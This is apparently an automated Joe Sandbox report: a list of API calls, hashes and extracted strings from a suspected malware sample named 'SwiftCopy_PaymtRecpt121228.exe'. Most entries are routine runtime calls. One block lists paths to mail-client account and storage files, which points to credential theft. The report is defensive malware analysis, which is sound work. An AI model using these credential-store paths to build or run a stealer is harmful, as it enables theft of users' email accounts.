                                                    • Opcode ID: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                                    • Instruction ID: 0a936c430148d26a69835db3fa9f683d01d5328c1142e13f0191aacd949c771e
                                                    • Opcode Fuzzy Hash: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                                    • Instruction Fuzzy Hash: D141D678E042189BEB12CF68C880A9FBBF9EF453A4F10C155E9159F25AD731FA01CB91

                                                    Control-flow Graph

                                                    APIs
                                                      • Part of subcall function 10009221: _free.LIBCMT ref: 1000924A
                                                    • _free.LIBCMT ref: 100092AB
                                                      • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                      • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                    • _free.LIBCMT ref: 100092B6
                                                    • _free.LIBCMT ref: 100092C1
                                                    • _free.LIBCMT ref: 10009315
                                                    • _free.LIBCMT ref: 10009320
                                                    • _free.LIBCMT ref: 1000932B
                                                    • _free.LIBCMT ref: 10009336
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4509884378.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000007.00000002.4509860233.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000007.00000002.4509884378.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10000000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: _free$ErrorFreeHeapLast
                                                    • String ID:
                                                    • API String ID: 776569668-0
                                                    • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                    • Instruction ID: 62dea9ede071ec04ae7e8d39c2d2a9b8d59ba4565e42afa4a1a73bd13a3591d1
                                                    • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                    • Instruction Fuzzy Hash: 3E118E35548B08FAFA20EBB0EC47FCB7B9DEF04780F400824BA9DB6097DA25B5249751
                                                    APIs
                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000), ref: 10004B59
                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 10004B6C
                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082), ref: 10004B8F
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4509884378.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000007.00000002.4509860233.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000007.00000002.4509884378.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10000000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                    • String ID: *O"/$CorExitProcess$mscoree.dll
                                                    • API String ID: 4061214504-915810377
                                                    • Opcode ID: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                                                    • Instruction ID: e6e2f78cdd7cd30bdf2d4d174718ae12991e9b6ae5ca6a82eaba56a43cf4d13d
                                                    • Opcode Fuzzy Hash: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                                                    • Instruction Fuzzy Hash: C8F03C71900218BBEB11AB94CC48BAEBFB9EF043D1F01416AE909A6164DF309941CAA5
                                                    APIs
                                                    • _strlen.LIBCMT ref: 10001607
                                                    • _strcat.LIBCMT ref: 1000161D
                                                    • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,1000190E,?,?,00000000,?,00000000), ref: 10001643
                                                    • lstrcatW.KERNEL32(?,?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 1000165A
                                                    • lstrlenW.KERNEL32(?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 10001661
                                                    • lstrcatW.KERNEL32(00001008,?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 10001686
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4509884378.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000007.00000002.4509860233.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000007.00000002.4509884378.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10000000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: lstrcatlstrlen$_strcat_strlen
                                                    • String ID:
                                                    • API String ID: 1922816806-0
                                                    • Opcode ID: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
                                                    • Instruction ID: a267a6945d1554df97f4c8e17fbec8689bbb0548aac84132402ab8fad08d9bbc
                                                    • Opcode Fuzzy Hash: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
                                                    • Instruction Fuzzy Hash: 9821A776900204ABEB05DBA4DC85FEE77B8EF88750F24401BF604AB185DF34B94587A9
                                                    APIs
                                                    • lstrcatW.KERNEL32(?,?,?,?,?,00000000), ref: 10001038
                                                    • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 1000104B
                                                    • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 10001061
                                                    • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 10001075
                                                    • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 10001090
                                                    • lstrlenW.KERNEL32(?,?,?,00000000), ref: 100010B8
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4509884378.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000007.00000002.4509860233.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000007.00000002.4509884378.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10000000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: lstrlen$AttributesFilelstrcat
                                                    • String ID:
                                                    • API String ID: 3594823470-0
                                                    • Opcode ID: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
                                                    • Instruction ID: f5da6160d3db499da992451a69b84f141dc83571de07cfa19ff2ab3d93a8fd2c
                                                    • Opcode Fuzzy Hash: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
                                                    • Instruction Fuzzy Hash: DB21E5359003289BEF10DBA0DC48EDF37B8EF44294F104556E999931A6DE709EC5CF50
                                                    APIs
                                                    • GetLastError.KERNEL32(?,?,10003518,100023F1,10001F17), ref: 10003864
                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 10003872
                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 1000388B
                                                    • SetLastError.KERNEL32(00000000,?,10003518,100023F1,10001F17), ref: 100038DD
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4509884378.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000007.00000002.4509860233.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000007.00000002.4509884378.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10000000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: ErrorLastValue___vcrt_
                                                    • String ID:
                                                    • API String ID: 3852720340-0
                                                    • Opcode ID: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
                                                    • Instruction ID: 2a33bd680f99e964f7cdf1ea0b0e713dcb61597015083b2077453114c578dac0
                                                    • Opcode Fuzzy Hash: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
                                                    • Instruction Fuzzy Hash: 0F012432608B225EF207D7796CCAA0B2BDDDB096F9B20C27AF510940E9EF219C009300
                                                    APIs
                                                    • GetLastError.KERNEL32(?,?,10006C6C), ref: 10005AFA
                                                    • _free.LIBCMT ref: 10005B2D
                                                    • _free.LIBCMT ref: 10005B55
                                                    • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B62
                                                    • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B6E
                                                    • _abort.LIBCMT ref: 10005B74
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4509884378.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000007.00000002.4509860233.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000007.00000002.4509884378.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10000000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$_free$_abort
                                                    • String ID:
                                                    • API String ID: 3160817290-0
                                                    • Opcode ID: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
                                                    • Instruction ID: 6ab9c425fee0725613b21b3b36aaf5e4259b246f4cabca8c388d0d7fb541d563
                                                    • Opcode Fuzzy Hash: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
                                                    • Instruction Fuzzy Hash: 8FF0A47A508911AAF212E3346C4AF0F36AACBC55E3F264125F918A619DFF27B9024174
                                                    APIs
                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,10006FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 10008731
                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 100087BA
                                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 100087CC
                                                    • __freea.LIBCMT ref: 100087D5
                                                      • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4509884378.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000007.00000002.4509860233.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000007.00000002.4509884378.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10000000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                    • String ID: *O"/
                                                    • API String ID: 2652629310-463055101
                                                    • Opcode ID: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                                                    • Instruction ID: 5b9b35b0a4db414dac5c81271493033b4f2f0f3dd9b893eeefd60fa04c8ec889
                                                    • Opcode Fuzzy Hash: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                                                    • Instruction Fuzzy Hash: 2731AE32A0021AABEF15CF64CC85EAF7BA5EF44290F214129FC48D7158EB35DE50CBA0
                                                    APIs
                                                      • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                                      • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,?,?,100010DF,?,?,?,00000000), ref: 10001EAC
                                                      • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                                      • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                                      • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,100010DF,?,100010DF,?,?,?,00000000), ref: 10001ED3
                                                    • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 1000122A
                                                      • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001855
                                                      • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001869
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4509884378.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000007.00000002.4509860233.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000007.00000002.4509884378.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10000000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                                    • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                    • API String ID: 4036392271-1520055953
                                                    • Opcode ID: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                                                    • Instruction ID: e2b7c7e1c3038021adfe9ab266432482c710e64fc4cfb1bae4cfd9c1521b4980
                                                    • Opcode Fuzzy Hash: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                                                    • Instruction Fuzzy Hash: 4B21D579E142486AFB14D7A0EC92FED7339EF80754F000556F604EB1D5EBB16E818758
                                                    APIs
                                                    • GetEnvironmentStringsW.KERNEL32 ref: 1000715C
                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1000717F
                                                      • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 100071A5
                                                    • _free.LIBCMT ref: 100071B8
                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 100071C7
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4509884378.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000007.00000002.4509860233.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000007.00000002.4509884378.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10000000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                    • String ID:
                                                    • API String ID: 336800556-0
                                                    • Opcode ID: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                                                    • Instruction ID: fdf90bdbf822fabaf3dd9d310e80898d5fc59248e37e3ebe61ec6e18e74c85b1
                                                    • Opcode Fuzzy Hash: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                                                    • Instruction Fuzzy Hash: 6601D872A01225BB73129BBE5C8CDBF2A6DFBC69E0311012AFD0CC7288DB658C0181B0
                                                    APIs
                                                    • GetLastError.KERNEL32(00000000,?,00000000,1000636D,10005713,00000000,?,10002249,?,?,10001D66,00000000,?,?,00000000), ref: 10005B7F
                                                    • _free.LIBCMT ref: 10005BB4
                                                    • _free.LIBCMT ref: 10005BDB
                                                    • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BE8
                                                    • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BF1
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4509884378.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000007.00000002.4509860233.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000007.00000002.4509884378.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10000000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$_free
                                                    • String ID:
                                                    • API String ID: 3170660625-0
                                                    • Opcode ID: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                                                    • Instruction ID: a404960836b3e2f032ab47abdd1028028b52a365ddf0c47563f665e512f3cffd
                                                    • Opcode Fuzzy Hash: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                                                    • Instruction Fuzzy Hash: 5501F47A108A52A7F202E7345C85E1F3AAEDBC55F37220025FD19A615EEF73FD024164
                                                    APIs
                                                    • lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                                    • lstrcatW.KERNEL32(?,?,?,100010DF,?,?,?,00000000), ref: 10001EAC
                                                    • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                                    • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                                    • lstrcatW.KERNEL32(?,100010DF,?,100010DF,?,?,?,00000000), ref: 10001ED3
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4509884378.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000007.00000002.4509860233.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000007.00000002.4509884378.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10000000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: lstrlen$lstrcat
                                                    • String ID:
                                                    • API String ID: 493641738-0
                                                    • Opcode ID: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                                                    • Instruction ID: f5d9027fafc921fe84ae6627056796c55de3fa1ad923a59450c5185d8ca5453c
                                                    • Opcode Fuzzy Hash: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                                                    • Instruction Fuzzy Hash: D8F082261002207AF621772AECC5FBF7B7CEFC6AA0F04001AFA0C83194DB54684292B5
                                                    APIs
                                                    • _free.LIBCMT ref: 100091D0
                                                      • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                      • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                    • _free.LIBCMT ref: 100091E2
                                                    • _free.LIBCMT ref: 100091F4
                                                    • _free.LIBCMT ref: 10009206
                                                    • _free.LIBCMT ref: 10009218
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4509884378.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000007.00000002.4509860233.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000007.00000002.4509884378.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10000000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: _free$ErrorFreeHeapLast
                                                    • String ID:
                                                    • API String ID: 776569668-0
                                                    • Opcode ID: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                                                    • Instruction ID: a08e021c65853776c99c3fd86fadada58ae96d962e635c5153d22f52a77de1c5
                                                    • Opcode Fuzzy Hash: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                                                    • Instruction Fuzzy Hash: 77F06DB161C650ABE664DB58EAC6C4B7BEDFB003E13608805FC4DD7549CB31FC809A64
                                                    APIs
                                                    • _free.LIBCMT ref: 1000536F
                                                      • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                      • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                    • _free.LIBCMT ref: 10005381
                                                    • _free.LIBCMT ref: 10005394
                                                    • _free.LIBCMT ref: 100053A5
                                                    • _free.LIBCMT ref: 100053B6
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4509884378.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000007.00000002.4509860233.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000007.00000002.4509884378.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10000000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: _free$ErrorFreeHeapLast
                                                    • String ID:
                                                    • API String ID: 776569668-0
                                                    • Opcode ID: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                                                    • Instruction ID: ba906e9feca9bc6e71cd1aa5ebacb8f64a9f241ffe6b13fedf7f16c4e4854dfa
                                                    • Opcode Fuzzy Hash: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                                                    • Instruction Fuzzy Hash: 38F0F478C18934EBF741DF28ADC140A3BB5F718A91342C15AFC1497279DB36D9429B84
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4509884378.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000007.00000002.4509860233.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000007.00000002.4509884378.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10000000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: *O"/
                                                    • API String ID: 0-463055101
                                                    • Opcode ID: a6e3e212e3e8e69e5b3e90cc56111543990103d41b7ff965f9c36c1ca3af5bcd
                                                    • Instruction ID: e0f187942aa90d3f3c40e731aaf8e1dc3f9218b11d74515a16622edea155382f
                                                    • Opcode Fuzzy Hash: a6e3e212e3e8e69e5b3e90cc56111543990103d41b7ff965f9c36c1ca3af5bcd
                                                    • Instruction Fuzzy Hash: C8519F75D0020AABFB11CFA4CD45FAE7BF9EF493A0F11405AF805A7299D731AA41CB61
                                                    APIs
                                                    • _free.LIBCMT ref: 1000655C
                                                      • Part of subcall function 100062BC: IsProcessorFeaturePresent.KERNEL32(00000017,100062AB,00000000,?,?,?,?,00000016,?,?,100062B8,00000000,00000000,00000000,00000000,00000000), ref: 100062BE
                                                      • Part of subcall function 100062BC: GetCurrentProcess.KERNEL32(C0000417), ref: 100062E0
                                                      • Part of subcall function 100062BC: TerminateProcess.KERNEL32(00000000), ref: 100062E7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4509884378.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000007.00000002.4509860233.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000007.00000002.4509884378.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10000000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                    • String ID: *?$*O"/$.
                                                    • API String ID: 2667617558-2265361421
                                                    • Opcode ID: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                    • Instruction ID: 55016225c6cf3c2ad74d5bf99958d96f24b8fe448c0df4d83e2be8db5664878a
                                                    • Opcode Fuzzy Hash: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                    • Instruction Fuzzy Hash: 2D519475E0060A9FEB14CFA8CC81AADB7F6FF4C394F258169E854E7349D635AE018B50
                                                    APIs
                                                    • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe,00000104), ref: 10004C1D
                                                    • _free.LIBCMT ref: 10004CE8
                                                    • _free.LIBCMT ref: 10004CF2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4509884378.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000007.00000002.4509860233.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000007.00000002.4509884378.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10000000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: _free$FileModuleName
                                                    • String ID: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe
                                                    • API String ID: 2506810119-3272021383
                                                    • Opcode ID: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                                                    • Instruction ID: 12f2da1a58c9c923660241357757b5dddff340f6d61411cdc8d35d961f62cc7a
                                                    • Opcode Fuzzy Hash: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                                                    • Instruction Fuzzy Hash: EB31A0B5A01258EFFB51CF99CC81D9EBBFCEB88390F12806AF80497215DA709E41CB54
                                                    APIs
                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,00000D55,00000000,00000000,?,00000000,?,?,10009C54,?,00000000,?), ref: 100099A8
                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,10009C54,?,00000000,?,00000000,00000000,?,00000000), ref: 100099D6
                                                    • GetLastError.KERNEL32(?,10009C54,?,00000000,?,00000000,00000000,?,00000000), ref: 10009A07
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4509884378.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000007.00000002.4509860233.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000007.00000002.4509884378.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10000000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: ByteCharErrorFileLastMultiWideWrite
                                                    • String ID: *O"/
                                                    • API String ID: 2456169464-463055101
                                                    • Opcode ID: 427868bedf5aeb2dbe74816aae85c58cffe3606ac2297d0d696d101185ff0d15
                                                    • Instruction ID: 4dca0cb6e5ae08cfaecef52c11f05f5c50a0db4386d341a895ff8b0f45518e07
                                                    • Opcode Fuzzy Hash: 427868bedf5aeb2dbe74816aae85c58cffe3606ac2297d0d696d101185ff0d15
                                                    • Instruction Fuzzy Hash: 7D314375A002199FEB14CF69CC95AEAB7B9EF48344F0144ADE50AD7254D730AD81CB61
                                                    APIs
                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,10001D66,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue), ref: 10005D13
                                                    • GetLastError.KERNEL32(?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000,00000364,?,10005BC8), ref: 10005D1F
                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000), ref: 10005D2D
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4509884378.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000007.00000002.4509860233.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000007.00000002.4509884378.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10000000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: LibraryLoad$ErrorLast
                                                    • String ID:
                                                    • API String ID: 3177248105-0
                                                    • Opcode ID: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                                                    • Instruction ID: ab8c2af688280ff547417c348c7c3430721907d0b6a0cc88e9d35c15e8af339b
                                                    • Opcode Fuzzy Hash: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                                                    • Instruction Fuzzy Hash: 59018436615732ABE7319B689C8CB4B7798EF056E2B214623F909D7158D731D801CAE0
                                                    APIs
